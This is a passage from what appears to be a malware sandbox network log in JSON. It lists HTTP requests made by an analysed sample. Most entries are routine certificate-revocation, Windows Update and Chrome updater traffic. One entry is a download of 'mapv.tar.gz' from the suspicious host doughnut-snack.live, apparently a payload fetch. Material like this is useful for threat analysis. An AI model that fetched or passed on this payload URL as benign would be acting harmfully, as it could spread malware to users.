  1387.         "data": "GET /GTSGIAG3/MFEwTzBNMEswSTAJBgUrDgMCGgUABBT27bBjYjKBmjX2jXWgnQJKEapsrQQUd8K4UJpndnaxLcKG0IOgfqZ%2BuksCEDoV9Mh%2FtNM5k9Pus79K5eQ%3D HTTP/1.1\r\nCache-Control: max-age = 86400\r\nConnection: Keep-Alive\r\nAccept: */*\r\nUser-Agent: Microsoft-CryptoAPI/6.1\r\nHost: ocsp.pki.goog\r\n\r\n",
  1388.         "port": 80
  1389.     },
  1390.     {
  1391.         "count": 1,
  1392.         "body": "",
  1393.         "uri": "http://doughnut-snack.live/mapv.tar.gz",
  1394.         "user-agent": "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.3)",
  1395.         "method": "GET",
  1396.         "host": "doughnut-snack.live",
  1397.         "version": "1.1",
  1398.         "path": "/mapv.tar.gz",
  1399.         "data": "GET /mapv.tar.gz HTTP/1.1\r\nAccept: */*\r\nAccept-Language: en-us\r\nCache-Control: max-age=0\r\nAccept-Encoding: gzip, deflate\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.3)\r\nHost: doughnut-snack.live\r\nConnection: Keep-Alive\r\n\r\n",
  1400.         "port": 80
  1401.     },
  1402.     {
  1403.         "count": 1,
  1404.         "body": "",
  1405.         "uri": "http://crl.microsoft.com/pki/crl/products/MicrosoftTimeStampPCA.crl",
  1406.         "user-agent": "Microsoft-CryptoAPI/6.1",
  1407.         "method": "GET",
  1408.         "host": "crl.microsoft.com",
  1409.         "version": "1.1",
  1410.         "path": "/pki/crl/products/MicrosoftTimeStampPCA.crl",
  1411.         "data": "GET /pki/crl/products/MicrosoftTimeStampPCA.crl HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nIf-Modified-Since: Sat, 16 Feb 2019 02:02:49 GMT\r\nUser-Agent: Microsoft-CryptoAPI/6.1\r\nHost: crl.microsoft.com\r\n\r\n",
  1412.         "port": 80
  1413.     },
  1414.     {
  1415.         "count": 1,
  1416.         "body": "",
  1417.         "uri": "http://ocsp.comodoca.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBReAhtobFzTvhaRmVeJ38QUchY9AwQUu69%2BAj36pvE8hI6t7jiY7NkyMtQCEDaCXn%2B1pIGTfvbRc2u5PKY%3D",
  1418.         "user-agent": "Microsoft-CryptoAPI/6.1",
  1419.         "method": "GET",
  1420.         "host": "ocsp.comodoca.com",
  1421.         "version": "1.1",
  1422.         "path": "/MFEwTzBNMEswSTAJBgUrDgMCGgUABBReAhtobFzTvhaRmVeJ38QUchY9AwQUu69%2BAj36pvE8hI6t7jiY7NkyMtQCEDaCXn%2B1pIGTfvbRc2u5PKY%3D",
  1423.         "data": "GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBReAhtobFzTvhaRmVeJ38QUchY9AwQUu69%2BAj36pvE8hI6t7jiY7NkyMtQCEDaCXn%2B1pIGTfvbRc2u5PKY%3D HTTP/1.1\r\nCache-Control: max-age = 94804\r\nConnection: Keep-Alive\r\nAccept: */*\r\nIf-Modified-Since: Mon, 11 Mar 2019 04:19:13 GMT\r\nUser-Agent: Microsoft-CryptoAPI/6.1\r\nHost: ocsp.comodoca.com\r\n\r\n",
  1424.         "port": 80
  1425.     },
  1426.     {
  1427.         "count": 1,
  1428.         "body": "",
  1429.         "uri": "http://ocsp.pki.goog/GTSGIAG3/MFEwTzBNMEswSTAJBgUrDgMCGgUABBT27bBjYjKBmjX2jXWgnQJKEapsrQQUd8K4UJpndnaxLcKG0IOgfqZ%2BuksCEEpXWRnDaZSEY67E8B6coDU%3D",
  1430.         "user-agent": "Microsoft-CryptoAPI/6.1",
  1431.         "method": "GET",
  1432.         "host": "ocsp.pki.goog",
  1433.         "version": "1.1",
  1434.         "path": "/GTSGIAG3/MFEwTzBNMEswSTAJBgUrDgMCGgUABBT27bBjYjKBmjX2jXWgnQJKEapsrQQUd8K4UJpndnaxLcKG0IOgfqZ%2BuksCEEpXWRnDaZSEY67E8B6coDU%3D",
  1435.         "data": "GET /GTSGIAG3/MFEwTzBNMEswSTAJBgUrDgMCGgUABBT27bBjYjKBmjX2jXWgnQJKEapsrQQUd8K4UJpndnaxLcKG0IOgfqZ%2BuksCEEpXWRnDaZSEY67E8B6coDU%3D HTTP/1.1\r\nCache-Control: max-age = 86400\r\nConnection: Keep-Alive\r\nAccept: */*\r\nUser-Agent: Microsoft-CryptoAPI/6.1\r\nHost: ocsp.pki.goog\r\n\r\n",
  1436.         "port": 80
  1437.     },
  1438.     {
  1439.         "count": 1,
  1440.         "body": "",
  1441.         "uri": "http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSPwl%2BrBFlJbvzLXU1bGW08VysJ2wQUj%2Bh%2B8G0yagAFI8dwl2o6kP9r6tQCEAaJg2QslT5G973OQUPxM8E%3D",
  1442.         "user-agent": "Microsoft-CryptoAPI/6.1",
  1443.         "method": "GET",
  1444.         "host": "ocsp.digicert.com",
  1445.         "version": "1.1",
  1446.         "path": "/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSPwl%2BrBFlJbvzLXU1bGW08VysJ2wQUj%2Bh%2B8G0yagAFI8dwl2o6kP9r6tQCEAaJg2QslT5G973OQUPxM8E%3D",
  1447.         "data": "GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBSPwl%2BrBFlJbvzLXU1bGW08VysJ2wQUj%2Bh%2B8G0yagAFI8dwl2o6kP9r6tQCEAaJg2QslT5G973OQUPxM8E%3D HTTP/1.1\r\nCache-Control: max-age = 143038\r\nConnection: Keep-Alive\r\nAccept: */*\r\nIf-Modified-Since: Sat, 23 Mar 2019 15:00:07 GMT\r\nIf-None-Match: \"5c9649f7-1d7\"\r\nUser-Agent: Microsoft-CryptoAPI/6.1\r\nHost: ocsp.digicert.com\r\n\r\n",
  1448.         "port": 80
  1449.     },
  1450.     {
  1451.         "count": 1,
  1452.         "body": "",
  1453.         "uri": "http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSnR4FoxLLkI7vkvsUIFlZt%2BlGH3gQUWsS5eyoKo6XqcQPAYPkt9mV1DlgCEAwVvkoVuwkDyQGx1sJlMC8%3D",
  1454.         "user-agent": "Microsoft-CryptoAPI/6.1",
  1455.         "method": "GET",
  1456.         "host": "ocsp.digicert.com",
  1457.         "version": "1.1",
  1458.         "path": "/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSnR4FoxLLkI7vkvsUIFlZt%2BlGH3gQUWsS5eyoKo6XqcQPAYPkt9mV1DlgCEAwVvkoVuwkDyQGx1sJlMC8%3D",
  1459.         "data": "GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBSnR4FoxLLkI7vkvsUIFlZt%2BlGH3gQUWsS5eyoKo6XqcQPAYPkt9mV1DlgCEAwVvkoVuwkDyQGx1sJlMC8%3D HTTP/1.1\r\nCache-Control: max-age = 108232\r\nConnection: Keep-Alive\r\nAccept: */*\r\nIf-Modified-Since: Fri, 22 Mar 2019 23:50:01 GMT\r\nIf-None-Match: \"5c9574a9-1d7\"\r\nUser-Agent: Microsoft-CryptoAPI/6.1\r\nHost: ocsp.digicert.com\r\n\r\n",
  1460.         "port": 80
  1461.     },
  1462.     {
  1463.         "count": 1,
  1464.         "body": "",
  1465.         "uri": "http://www.download.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab",
  1466.         "user-agent": "Microsoft-CryptoAPI/6.1",
  1467.         "method": "GET",
  1468.         "host": "www.download.windowsupdate.com",
  1469.         "version": "1.1",
  1470.         "path": "/msdownload/update/v3/static/trustedr/en/authrootstl.cab",
  1471.         "data": "GET /msdownload/update/v3/static/trustedr/en/authrootstl.cab HTTP/1.1\r\nCache-Control: max-age = 86400\r\nConnection: Keep-Alive\r\nAccept: */*\r\nIf-Modified-Since: Fri, 22 Feb 2019 16:53:13 GMT\r\nIf-None-Match: \"80e22c19cfcad41:0\"\r\nUser-Agent: Microsoft-CryptoAPI/6.1\r\nHost: www.download.windowsupdate.com\r\n\r\n",
  1472.         "port": 80
  1473.     },
  1474.     {
  1475.         "count": 1,
  1476.         "body": "",
  1477.         "uri": "http://crl.microsoft.com/pki/crl/products/MicCodSigPCA_08-31-2010.crl",
  1478.         "user-agent": "Microsoft-CryptoAPI/6.1",
  1479.         "method": "GET",
  1480.         "host": "crl.microsoft.com",
  1481.         "version": "1.1",
  1482.         "path": "/pki/crl/products/MicCodSigPCA_08-31-2010.crl",
  1483.         "data": "GET /pki/crl/products/MicCodSigPCA_08-31-2010.crl HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nIf-Modified-Since: Thu, 14 Feb 2019 06:01:18 GMT\r\nUser-Agent: Microsoft-CryptoAPI/6.1\r\nHost: crl.microsoft.com\r\n\r\n",
  1484.         "port": 80
  1485.     },
  1486.     {
  1487.         "count": 1,
  1488.         "body": "",
  1489.         "uri": "http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTBL0V27RVZ7LBduom%2FnYB45SPUEwQU5Z1ZMIJHWMys%2BghUNoZ7OrUETfACEA8sEMlbBsCTf7jUSfg%2BhWk%3D",
  1490.         "user-agent": "Microsoft-CryptoAPI/6.1",
  1491.         "method": "GET",
  1492.         "host": "ocsp.digicert.com",
  1493.         "version": "1.1",
  1494.         "path": "/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTBL0V27RVZ7LBduom%2FnYB45SPUEwQU5Z1ZMIJHWMys%2BghUNoZ7OrUETfACEA8sEMlbBsCTf7jUSfg%2BhWk%3D",
  1495.         "data": "GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBTBL0V27RVZ7LBduom%2FnYB45SPUEwQU5Z1ZMIJHWMys%2BghUNoZ7OrUETfACEA8sEMlbBsCTf7jUSfg%2BhWk%3D HTTP/1.1\r\nCache-Control: max-age = 93156\r\nConnection: Keep-Alive\r\nAccept: */*\r\nIf-Modified-Since: Sat, 16 Mar 2019 04:40:45 GMT\r\nIf-None-Match: \"5c8c7e4d-1d7\"\r\nUser-Agent: Microsoft-CryptoAPI/6.1\r\nHost: ocsp.digicert.com\r\n\r\n",
  1496.         "port": 80
  1497.     },
  1498.     {
  1499.         "count": 1,
  1500.         "body": "",
  1501.         "uri": "http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBT3xL4LQLXDRDM9P665TW442vrsUQQUReuir%2FSSy4IxLVGLp6chnfNtyA8CEAQJGBtf1btmdVNDtW%2BVUAg%3D",
  1502.         "user-agent": "Microsoft-CryptoAPI/6.1",
  1503.         "method": "GET",
  1504.         "host": "ocsp.digicert.com",
  1505.         "version": "1.1",
  1506.         "path": "/MFEwTzBNMEswSTAJBgUrDgMCGgUABBT3xL4LQLXDRDM9P665TW442vrsUQQUReuir%2FSSy4IxLVGLp6chnfNtyA8CEAQJGBtf1btmdVNDtW%2BVUAg%3D",
  1507.         "data": "GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBT3xL4LQLXDRDM9P665TW442vrsUQQUReuir%2FSSy4IxLVGLp6chnfNtyA8CEAQJGBtf1btmdVNDtW%2BVUAg%3D HTTP/1.1\r\nCache-Control: max-age = 149079\r\nConnection: Keep-Alive\r\nAccept: */*\r\nIf-Modified-Since: Sat, 23 Mar 2019 11:10:47 GMT\r\nIf-None-Match: \"5c961437-1d7\"\r\nUser-Agent: Microsoft-CryptoAPI/6.1\r\nHost: ocsp.digicert.com\r\n\r\n",
  1508.         "port": 80
  1509.     },
  1510.     {
  1511.         "count": 1,
  1512.         "body": "",
  1513.         "uri": "http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTBL0V27RVZ7LBduom%2FnYB45SPUEwQU5Z1ZMIJHWMys%2BghUNoZ7OrUETfACEAiIzVJfGSRETRSlgpHeuVI%3D",
  1514.         "user-agent": "Microsoft-CryptoAPI/6.1",
  1515.         "method": "GET",
  1516.         "host": "ocsp.digicert.com",
  1517.         "version": "1.1",
  1518.         "path": "/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTBL0V27RVZ7LBduom%2FnYB45SPUEwQU5Z1ZMIJHWMys%2BghUNoZ7OrUETfACEAiIzVJfGSRETRSlgpHeuVI%3D",
  1519.         "data": "GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBTBL0V27RVZ7LBduom%2FnYB45SPUEwQU5Z1ZMIJHWMys%2BghUNoZ7OrUETfACEAiIzVJfGSRETRSlgpHeuVI%3D HTTP/1.1\r\nCache-Control: max-age = 148251\r\nConnection: Keep-Alive\r\nAccept: */*\r\nIf-Modified-Since: Sat, 16 Mar 2019 18:10:24 GMT\r\nIf-None-Match: \"5c8d3c10-1d7\"\r\nUser-Agent: Microsoft-CryptoAPI/6.1\r\nHost: ocsp.digicert.com\r\n\r\n",
  1520.         "port": 80
  1521.     },
  1522.     {
  1523.         "count": 1,
  1524.         "body": "",
  1525.         "uri": "http://ocsp.pki.goog/GTSGIAG3/MFEwTzBNMEswSTAJBgUrDgMCGgUABBT27bBjYjKBmjX2jXWgnQJKEapsrQQUd8K4UJpndnaxLcKG0IOgfqZ%2BuksCEH4PjD8bD0NfJXpoX0ln6s4%3D",
  1526.         "user-agent": "Microsoft-CryptoAPI/6.1",
  1527.         "method": "GET",
  1528.         "host": "ocsp.pki.goog",
  1529.         "version": "1.1",
  1530.         "path": "/GTSGIAG3/MFEwTzBNMEswSTAJBgUrDgMCGgUABBT27bBjYjKBmjX2jXWgnQJKEapsrQQUd8K4UJpndnaxLcKG0IOgfqZ%2BuksCEH4PjD8bD0NfJXpoX0ln6s4%3D",
  1531.         "data": "GET /GTSGIAG3/MFEwTzBNMEswSTAJBgUrDgMCGgUABBT27bBjYjKBmjX2jXWgnQJKEapsrQQUd8K4UJpndnaxLcKG0IOgfqZ%2BuksCEH4PjD8bD0NfJXpoX0ln6s4%3D HTTP/1.1\r\nCache-Control: max-age = 86400\r\nConnection: Keep-Alive\r\nAccept: */*\r\nUser-Agent: Microsoft-CryptoAPI/6.1\r\nHost: ocsp.pki.goog\r\n\r\n",
  1532.         "port": 80
  1533.     },
  1534.     {
  1535.         "count": 1,
  1536.         "body": "",
  1537.         "uri": "http://ocsp.pki.goog/GTSGIAG3/MFEwTzBNMEswSTAJBgUrDgMCGgUABBT27bBjYjKBmjX2jXWgnQJKEapsrQQUd8K4UJpndnaxLcKG0IOgfqZ%2BuksCEHQnb7Tt0tUhlRVnnq4nPN8%3D",
  1538.         "user-agent": "Microsoft-CryptoAPI/6.1",
  1539.         "method": "GET",
  1540.         "host": "ocsp.pki.goog",
  1541.         "version": "1.1",
  1542.         "path": "/GTSGIAG3/MFEwTzBNMEswSTAJBgUrDgMCGgUABBT27bBjYjKBmjX2jXWgnQJKEapsrQQUd8K4UJpndnaxLcKG0IOgfqZ%2BuksCEHQnb7Tt0tUhlRVnnq4nPN8%3D",
  1543.         "data": "GET /GTSGIAG3/MFEwTzBNMEswSTAJBgUrDgMCGgUABBT27bBjYjKBmjX2jXWgnQJKEapsrQQUd8K4UJpndnaxLcKG0IOgfqZ%2BuksCEHQnb7Tt0tUhlRVnnq4nPN8%3D HTTP/1.1\r\nCache-Control: max-age = 86400\r\nConnection: Keep-Alive\r\nAccept: */*\r\nUser-Agent: Microsoft-CryptoAPI/6.1\r\nHost: ocsp.pki.goog\r\n\r\n",
  1544.         "port": 80
  1545.     },
  1546.     {
  1547.         "count": 1,
  1548.         "body": "",
  1549.         "uri": "http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSnR4FoxLLkI7vkvsUIFlZt%2BlGH3gQUWsS5eyoKo6XqcQPAYPkt9mV1DlgCEAM%2B1e2gZdG4yR38%2BSpsm9g%3D",
  1550.         "user-agent": "Microsoft-CryptoAPI/6.1",
  1551.         "method": "GET",
  1552.         "host": "ocsp.digicert.com",
  1553.         "version": "1.1",
  1554.         "path": "/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSnR4FoxLLkI7vkvsUIFlZt%2BlGH3gQUWsS5eyoKo6XqcQPAYPkt9mV1DlgCEAM%2B1e2gZdG4yR38%2BSpsm9g%3D",
  1555.         "data": "GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBSnR4FoxLLkI7vkvsUIFlZt%2BlGH3gQUWsS5eyoKo6XqcQPAYPkt9mV1DlgCEAM%2B1e2gZdG4yR38%2BSpsm9g%3D HTTP/1.1\r\nCache-Control: max-age = 126990\r\nConnection: Keep-Alive\r\nAccept: */*\r\nIf-Modified-Since: Sat, 23 Mar 2019 10:41:16 GMT\r\nIf-None-Match: \"5c960d4c-1d7\"\r\nUser-Agent: Microsoft-CryptoAPI/6.1\r\nHost: ocsp.digicert.com\r\n\r\n",
  1556.         "port": 80
  1557.     },
  1558.     {
  1559.         "count": 1,
  1560.         "body": "",
  1561.         "uri": "http://ocsp.pki.goog/GTSGIAG3/MFEwTzBNMEswSTAJBgUrDgMCGgUABBT27bBjYjKBmjX2jXWgnQJKEapsrQQUd8K4UJpndnaxLcKG0IOgfqZ%2BuksCEHAHFVlJElKyLEMbtWWDIbo%3D",
  1562.         "user-agent": "Microsoft-CryptoAPI/6.1",
  1563.         "method": "GET",
  1564.         "host": "ocsp.pki.goog",
  1565.         "version": "1.1",
  1566.         "path": "/GTSGIAG3/MFEwTzBNMEswSTAJBgUrDgMCGgUABBT27bBjYjKBmjX2jXWgnQJKEapsrQQUd8K4UJpndnaxLcKG0IOgfqZ%2BuksCEHAHFVlJElKyLEMbtWWDIbo%3D",
  1567.         "data": "GET /GTSGIAG3/MFEwTzBNMEswSTAJBgUrDgMCGgUABBT27bBjYjKBmjX2jXWgnQJKEapsrQQUd8K4UJpndnaxLcKG0IOgfqZ%2BuksCEHAHFVlJElKyLEMbtWWDIbo%3D HTTP/1.1\r\nCache-Control: max-age = 86400\r\nConnection: Keep-Alive\r\nAccept: */*\r\nUser-Agent: Microsoft-CryptoAPI/6.1\r\nHost: ocsp.pki.goog\r\n\r\n",
  1568.         "port": 80
  1569.     },
  1570.     {
  1571.         "count": 1,
  1572.         "body": "",
  1573.         "uri": "http://ocsp.thawte.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQwF4prw9S7mCbCEHD%2Fyl6nWPkczAQUe1tFz6%2FOy3r9MZIaarbzRutXSFACEEeXTXhzpbyrDS%2BzcBkvzl4%3D",
  1574.         "user-agent": "Microsoft-CryptoAPI/6.1",
  1575.         "method": "GET",
  1576.         "host": "ocsp.thawte.com",
  1577.         "version": "1.1",
  1578.         "path": "/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQwF4prw9S7mCbCEHD%2Fyl6nWPkczAQUe1tFz6%2FOy3r9MZIaarbzRutXSFACEEeXTXhzpbyrDS%2BzcBkvzl4%3D",
  1579.         "data": "GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBQwF4prw9S7mCbCEHD%2Fyl6nWPkczAQUe1tFz6%2FOy3r9MZIaarbzRutXSFACEEeXTXhzpbyrDS%2BzcBkvzl4%3D HTTP/1.1\r\nCache-Control: max-age = 320712\r\nConnection: Keep-Alive\r\nAccept: */*\r\nIf-Modified-Since: Wed, 20 Mar 2019 11:42:01 GMT\r\nUser-Agent: Microsoft-CryptoAPI/6.1\r\nHost: ocsp.thawte.com\r\n\r\n",
  1580.         "port": 80
  1581.     },
  1582.     {
  1583.         "count": 1,
  1584.         "body": "",
  1585.         "uri": "http://th.symcd.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBRsif7263KedmR2MLuYKv9%2BWQCtWAQU1A1lP3q9NMb%2BR%2BdMDcC98t4Vq3ECEBT4%2FdFn%2BSQCsVcLXcSVyBU%3D",
  1586.         "user-agent": "Microsoft-CryptoAPI/6.1",
  1587.         "method": "GET",
  1588.         "host": "th.symcd.com",
  1589.         "version": "1.1",
  1590.         "path": "/MFEwTzBNMEswSTAJBgUrDgMCGgUABBRsif7263KedmR2MLuYKv9%2BWQCtWAQU1A1lP3q9NMb%2BR%2BdMDcC98t4Vq3ECEBT4%2FdFn%2BSQCsVcLXcSVyBU%3D",
  1591.         "data": "GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBRsif7263KedmR2MLuYKv9%2BWQCtWAQU1A1lP3q9NMb%2BR%2BdMDcC98t4Vq3ECEBT4%2FdFn%2BSQCsVcLXcSVyBU%3D HTTP/1.1\r\nCache-Control: max-age = 386377\r\nConnection: Keep-Alive\r\nAccept: */*\r\nIf-Modified-Since: Thu, 21 Mar 2019 05:58:32 GMT\r\nUser-Agent: Microsoft-CryptoAPI/6.1\r\nHost: th.symcd.com\r\n\r\n",
  1592.         "port": 80
  1593.     },
  1594.     {
  1595.         "count": 1,
  1596.         "body": "",
  1597.         "uri": "http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAH9o%2BtuynXIiEOLckvPvJE%3D",
  1598.         "user-agent": "Microsoft-CryptoAPI/6.1",
  1599.         "method": "GET",
  1600.         "host": "ocsp.digicert.com",
  1601.         "version": "1.1",
  1602.         "path": "/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAH9o%2BtuynXIiEOLckvPvJE%3D",
  1603.         "data": "GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAH9o%2BtuynXIiEOLckvPvJE%3D HTTP/1.1\r\nCache-Control: max-age = 142986\r\nConnection: Keep-Alive\r\nAccept: */*\r\nIf-Modified-Since: Tue, 28 May 2019 07:40:28 GMT\r\nIf-None-Match: \"5cece5ec-1d7\"\r\nUser-Agent: Microsoft-CryptoAPI/6.1\r\nHost: ocsp.digicert.com\r\n\r\n",
  1604.         "port": 80
  1605.     },
  1606.     {
  1607.         "count": 1,
  1608.         "body": "",
  1609.         "uri": "http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAVG%2Fhgj9%2BGUHaOfzhTEYXM%3D",
  1610.         "user-agent": "Microsoft-CryptoAPI/6.1",
  1611.         "method": "GET",
  1612.         "host": "ocsp.digicert.com",
  1613.         "version": "1.1",
  1614.         "path": "/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAVG%2Fhgj9%2BGUHaOfzhTEYXM%3D",
  1615.         "data": "GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAVG%2Fhgj9%2BGUHaOfzhTEYXM%3D HTTP/1.1\r\nCache-Control: max-age = 161796\r\nConnection: Keep-Alive\r\nAccept: */*\r\nIf-Modified-Since: Tue, 28 May 2019 13:00:33 GMT\r\nIf-None-Match: \"5ced30f1-1d7\"\r\nUser-Agent: Microsoft-CryptoAPI/6.1\r\nHost: ocsp.digicert.com\r\n\r\n",
  1616.         "port": 80
  1617.     },
  1618.     {
  1619.         "count": 1,
  1620.         "body": "",
  1621.         "uri": "http://ocsp.pki.goog/gsr2/ME4wTDBKMEgwRjAJBgUrDgMCGgUABBTgXIsxbvr2lBkPpoIEVRE6gHlCnAQUm%2BIHV2ccHsBqBt5ZtJot39wZhi4CDQHjqTAc%2FHIGOD%2BaUx0%3D",
  1622.         "user-agent": "Microsoft-CryptoAPI/6.1",
  1623.         "method": "GET",
  1624.         "host": "ocsp.pki.goog",
  1625.         "version": "1.1",
  1626.         "path": "/gsr2/ME4wTDBKMEgwRjAJBgUrDgMCGgUABBTgXIsxbvr2lBkPpoIEVRE6gHlCnAQUm%2BIHV2ccHsBqBt5ZtJot39wZhi4CDQHjqTAc%2FHIGOD%2BaUx0%3D",
  1627.         "data": "GET /gsr2/ME4wTDBKMEgwRjAJBgUrDgMCGgUABBTgXIsxbvr2lBkPpoIEVRE6gHlCnAQUm%2BIHV2ccHsBqBt5ZtJot39wZhi4CDQHjqTAc%2FHIGOD%2BaUx0%3D HTTP/1.1\r\nCache-Control: max-age = 86400\r\nConnection: Keep-Alive\r\nAccept: */*\r\nUser-Agent: Microsoft-CryptoAPI/6.1\r\nHost: ocsp.pki.goog\r\n\r\n",
  1628.         "port": 80
  1629.     },
  1630.     {
  1631.         "count": 1,
  1632.         "body": "",
  1633.         "uri": "http://crl.microsoft.com/pki/crl/products/microsoftrootcert.crl",
  1634.         "user-agent": "Microsoft-CryptoAPI/6.1",
  1635.         "method": "GET",
  1636.         "host": "crl.microsoft.com",
  1637.         "version": "1.1",
  1638.         "path": "/pki/crl/products/microsoftrootcert.crl",
  1639.         "data": "GET /pki/crl/products/microsoftrootcert.crl HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nIf-Modified-Since: Thu, 07 Mar 2019 06:00:16 GMT\r\nUser-Agent: Microsoft-CryptoAPI/6.1\r\nHost: crl.microsoft.com\r\n\r\n",
  1640.         "port": 80
  1641.     },
  1642.     {
  1643.         "count": 1,
  1644.         "body": "",
  1645.         "uri": "http://redirector.gvt1.com/edgedl/release2/chrome/ANcTHgjx95-y_74.0.3729.169/74.0.3729.169_73.0.3683.86_chrome_updater.exe",
  1646.         "user-agent": "Microsoft BITS/7.5",
  1647.         "method": "HEAD",
  1648.         "host": "redirector.gvt1.com",
  1649.         "version": "1.1",
  1650.         "path": "/edgedl/release2/chrome/ANcTHgjx95-y_74.0.3729.169/74.0.3729.169_73.0.3683.86_chrome_updater.exe",
  1651.         "data": "HEAD /edgedl/release2/chrome/ANcTHgjx95-y_74.0.3729.169/74.0.3729.169_73.0.3683.86_chrome_updater.exe HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nAccept-Encoding: identity\r\nUser-Agent: Microsoft BITS/7.5\r\nX-Old-UID: cnt=0\r\nX-Last-HR: 0x0\r\nX-Last-HTTP-Status-Code: 0\r\nX-Retry-Count: 0\r\nX-HTTP-Attempts: 1\r\nHost: redirector.gvt1.com\r\n\r\n",
  1652.         "port": 80
  1653.     },
  1654.     {
  1655.         "count": 1,
  1656.         "body": "",
  1657.         "uri": "http://r4---sn-tt1e7n7k.gvt1.com/edgedl/release2/chrome/ANcTHgjx95-y_74.0.3729.169/74.0.3729.169_73.0.3683.86_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7k&ms=nvh&mt=1560902783&mv=m&pl=24&shardbypass=yes",
  1658.         "user-agent": "Microsoft BITS/7.5",
  1659.         "method": "HEAD",
  1660.         "host": "r4---sn-tt1e7n7k.gvt1.com",
  1661.         "version": "1.1",
  1662.         "path": "/edgedl/release2/chrome/ANcTHgjx95-y_74.0.3729.169/74.0.3729.169_73.0.3683.86_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7k&ms=nvh&mt=1560902783&mv=m&pl=24&shardbypass=yes",
  1663.         "data": "HEAD /edgedl/release2/chrome/ANcTHgjx95-y_74.0.3729.169/74.0.3729.169_73.0.3683.86_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7k&ms=nvh&mt=1560902783&mv=m&pl=24&shardbypass=yes HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nAccept-Encoding: identity\r\nUser-Agent: Microsoft BITS/7.5\r\nX-Old-UID: cnt=0\r\nX-Last-HR: 0x0\r\nX-Last-HTTP-Status-Code: 0\r\nX-Retry-Count: 0\r\nX-HTTP-Attempts: 1\r\nHost: r4---sn-tt1e7n7k.gvt1.com\r\n\r\n",
  1664.         "port": 80
  1665.     },
  1666.     {
  1667.         "count": 1,
  1668.         "body": "",
  1669.         "uri": "http://r4---sn-tt1e7n7k.gvt1.com/edgedl/release2/chrome/ANcTHgjx95-y_74.0.3729.169/74.0.3729.169_73.0.3683.86_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7k&ms=nvh&mt=1560902783&mv=m&pl=24&shardbypass=yes",
  1670.         "user-agent": "Microsoft BITS/7.5",
  1671.         "method": "GET",
  1672.         "host": "r4---sn-tt1e7n7k.gvt1.com",
  1673.         "version": "1.1",
  1674.         "path": "/edgedl/release2/chrome/ANcTHgjx95-y_74.0.3729.169/74.0.3729.169_73.0.3683.86_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7k&ms=nvh&mt=1560902783&mv=m&pl=24&shardbypass=yes",
